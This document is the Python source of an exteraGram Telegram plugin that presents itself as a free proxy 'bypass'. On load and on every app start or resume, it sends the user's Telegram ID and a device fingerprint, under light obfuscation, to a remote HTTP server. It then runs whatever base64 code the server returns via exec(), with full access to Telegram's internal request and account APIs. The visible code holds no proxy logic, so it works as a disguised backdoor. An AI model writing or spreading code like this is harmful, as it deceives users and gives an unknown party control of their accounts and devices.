__id__ = "Bypass"
__name__ = "Байпасик (Free)"
__description__ = "Вы сами понимаете что делает этот плагин, наверное...?"
__author__ = "@exteraPluginsSup, @NimarkoProject"
__version__ = "1.0.67"
__icon__ = "exteraPluginsSup/1"
__min_version__ = "12.1.1"

import json
import threading
import urllib.request
import base64
import time
import ssl
import hashlib
import random
import string
from base_plugin import BasePlugin, AppEvent
from ui.bulletin import BulletinHelper
from ui.settings import Header, Text, Divider
from android_utils import run_on_ui_thread
from client_utils import run_on_queue, send_request, RequestCallback
from org.telegram.messenger import NotificationCenter, SharedConfig, MessagesController, UserConfig, LocaleController, ApplicationLoader
from org.telegram.tgnet import ConnectionsManager, TLRPC
from hook_utils import find_class

API_URL = "http://bypass.ettacent.dev:6868/api/v1/module"

def _gdfp():
    try:
        from android.provider import Settings
        from android.os import Build
        ctx = ApplicationLoader.applicationContext
        aid = Settings.Secure.getString(ctx.getContentResolver(), Settings.Secure.ANDROID_ID)
        bfp = Build.FINGERPRINT
        try:
            pm = ctx.getPackageManager()
            pkg = ctx.getPackageName()
            sig = pm.getPackageInfo(pkg, pm.GET_SIGNATURES).signatures[0]
            sh = hashlib.md5(sig.toByteArray()).hexdigest()
        except:
            sh = "pkg"
        return f"{aid}:{bfp}:{sh}"
    except:
        return None

def _sig(uid, ts, nc):
    return hashlib.sha256(f"extera_bypass_v7_{uid}{ts}{nc}_salt_q8w2e".encode()).hexdigest()[:32]

def _nc():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def _enc(d):
    j = json.dumps(d)
    b = base64.b64encode(j.encode()).decode()[::-1]
    c = [b[i:i+4] for i in range(0, len(b), 4)]
    return ''.join([c[i] + format(i ^ 0xAB, '02x') for i in range(len(c))])

class BypassPlugin(BasePlugin):
    def __init__(self):
        super().__init__()
        self._ia = False
        self._iu = False
        self._il = False
        self._uid = 0
        self._strings = {}
        self._ec = {}
        self._lk = threading.Lock()
        self._pi = None
        self._pd = None

    def _guid(self):
        try:
            uc = UserConfig.getInstance(UserConfig.selectedAccount)
            if uc and uc.isClientActivated():
                cu = uc.getCurrentUser()
                if cu:
                    return int(cu.id)
        except:
            pass
        return 0

    def _ustr(self):
        try:
            lc = LocaleController.getInstance().getCurrentLocaleInfo().getLangCode()
        except:
            lc = "en"
        is_ru = lc.startswith("ru")
        self._strings = {
            "not_logged_in": "Войдите в аккаунт" if is_ru else "Please log in first",
            "check_failed": "Ошибка проверки статуса" if is_ru else "Status check failed",
            "activated": "🛡 Байпас активирован" if is_ru else "🛡 Bypass activated",
            "deactivated": "Прокси отключён" if is_ru else "Proxy disabled",
            "proxy_blocked": "⛔ Изменение запрещено" if is_ru else "⛔ Changes blocked",
            "status_header": "Статус" if is_ru else "Status",
            "status_active": "🟢 Байпас активен" if is_ru else "🟢 Bypass active",
            "status_inactive": "🔴 Неактивно" if is_ru else "🔴 Inactive",
            "status_checking": "🟡 Проверка..." if is_ru else "🟡 Checking...",
            "features_header": "Возможности" if is_ru else "Features",
            "feature_mtproto": "✓ MTProto прокси" if is_ru else "✓ MTProto proxy",
            "feature_server": "✓ Серверная валидация" if is_ru else "✓ Server validation",
            "feature_block": "✓ Блокировка изменений" if is_ru else "✓ Change blocking",
            "session_header": "Сессия" if is_ru else "Session",
            "session_valid": "✓ Сессия активна" if is_ru else "✓ Session active",
            "session_expires": "Истекает" if is_ru else "Expires",
            "info_header": "Информация" if is_ru else "Information",
            "refresh": "Обновить сессию" if is_ru else "Refresh session",
            "device_error": "Устройство не поддерживается" if is_ru else "Device not supported",
        }

    def _gs(self, k):
        return self._strings.get(k, k)

    def _exec(self, code_b64):
        try:
            code = base64.b64decode(code_b64).decode('utf-8')
            eg = {
                "TLRPC": TLRPC,
                "SharedConfig": SharedConfig,
                "ConnectionsManager": ConnectionsManager,
                "MessagesController": MessagesController,
                "UserConfig": UserConfig,
                "NotificationCenter": NotificationCenter,
                "ApplicationLoader": ApplicationLoader,
                "send_request": send_request,
                "RequestCallback": RequestCallback,
                "run_on_queue": run_on_queue,
                "run_on_ui_thread": run_on_ui_thread,
                "find_class": find_class,
                "BulletinHelper": BulletinHelper,
                "hashlib": hashlib,
                "base64": base64,
                "json": json,
                "time": time,
                "threading": threading,
                "_plugin": self,
                "_exec_result": None
            }
            exec(code, eg)
            return eg.get("_exec_result")
        except:
            return None

    def _load(self):
        if self._il:
            return
        with self._lk:
            if self._il:
                return
            self._il = True
            try:
                dfp = _gdfp()
                if not dfp:
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("device_error")))
                    return
                ts = int(time.time())
                nc = _nc()
                sg = _sig(self._uid, ts, nc)
                headers = {
                    "Content-Type": "application/json",
                    "User-Agent": "ExteraBypass/7.0",
                    "X-Timestamp": str(ts),
                    "X-Nonce": nc,
                    "X-Signature": sg
                }
                payload = {
                    "payload": _enc({"user_id": self._uid, "device_fp": dfp}),
                    "ts": ts,
                    "nonce": nc
                }
                body = json.dumps(payload).encode('utf-8')
                req = urllib.request.Request(API_URL, data=body, headers=headers, method="POST")
                ctx = ssl.create_default_context()
                with urllib.request.urlopen(req, timeout=20, context=ctx) as resp:
                    response = json.loads(resp.read().decode('utf-8'))
                if not response.get("success"):
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                    return
                exec_code = response.get("exec")
                if not exec_code:
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                    return
                result = self._exec(exec_code)
                if result and result.get("success"):
                    self._ia = True
                    self._ec = result
                    run_on_ui_thread(lambda: BulletinHelper.show_success(self._gs("activated")))
                else:
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
            except:
                run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
            finally:
                self._il = False

    def on_plugin_load(self):
        self._iu = False
        self._ia = False
        self._il = False
        self._ustr()
        self._uid = self._guid()
        if self._uid == 0:
            run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("not_logged_in")))
            return
        run_on_ui_thread(lambda: BulletinHelper.show_info(self._gs("status_checking")))
        threading.Thread(target=self._load, daemon=True).start()

    def on_plugin_unload(self):
        self._iu = True
        self._ia = False
        self._il = False
        self._ec = {}
        self._pi = None
        self._pd = None
        try:
            for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
                try:
                    cm = ConnectionsManager.getInstance(ac)
                    if cm:
                        cm.setProxySettings(False, "", 0, "", "", "")
                except:
                    pass
            SharedConfig.proxyEnabled = False
            SharedConfig.currentProxy = None
            NotificationCenter.getGlobalInstance().postNotificationName(NotificationCenter.proxySettingsChanged)
        except:
            pass
        run_on_ui_thread(lambda: BulletinHelper.show_info(self._gs("deactivated")))

    def on_app_event(self, et):
        if self._iu or self._il:
            return
        if et == AppEvent.START or et == AppEvent.RESUME:
            if not self._ia and self._uid > 0:
                threading.Thread(target=self._load, daemon=True).start()

    def create_settings(self):
        self._ustr()
        settings = [Header(text=self._gs("status_header"))]
        if self._ia:
            settings.append(Text(text=self._gs("status_active"), subtext=f"User ID: {self._uid}"))
            settings.append(Divider())
            settings.append(Header(text=self._gs("features_header")))
            settings.append(Text(text=self._gs("feature_mtproto")))
            settings.append(Text(text=self._gs("feature_server")))
            settings.append(Text(text=self._gs("feature_block")))
            settings.append(Divider())
            settings.append(Header(text=self._gs("session_header")))
            settings.append(Text(text=self._gs("session_valid")))
            if self._ec.get("expires_at"):
                remaining = self._ec["expires_at"] - int(time.time())
                if remaining > 0:
                    hours = remaining // 3600
                    minutes = (remaining % 3600) // 60
                    if hours > 0:
                        time_str = f"{hours}ч {minutes}м"
                    else:
                        time_str = f"{minutes}м"
                    settings.append(Text(text=f"{self._gs('session_expires')}: {time_str}"))
        else:
            settings.append(Text(text=self._gs("status_inactive")))
        settings.append(Divider())
        settings.append(Text(text=self._gs("refresh"), icon="msg_retry", on_click=lambda *a: self._orc()))
        return settings

    def _orc(self):
        if self._il:
            return
        self._uid = self._guid()
        if self._uid == 0:
            BulletinHelper.show_error(self._gs("not_logged_in"))
            return
        BulletinHelper.show_info(self._gs("status_checking"))
        threading.Thread(target=self._load, daemon=True).start()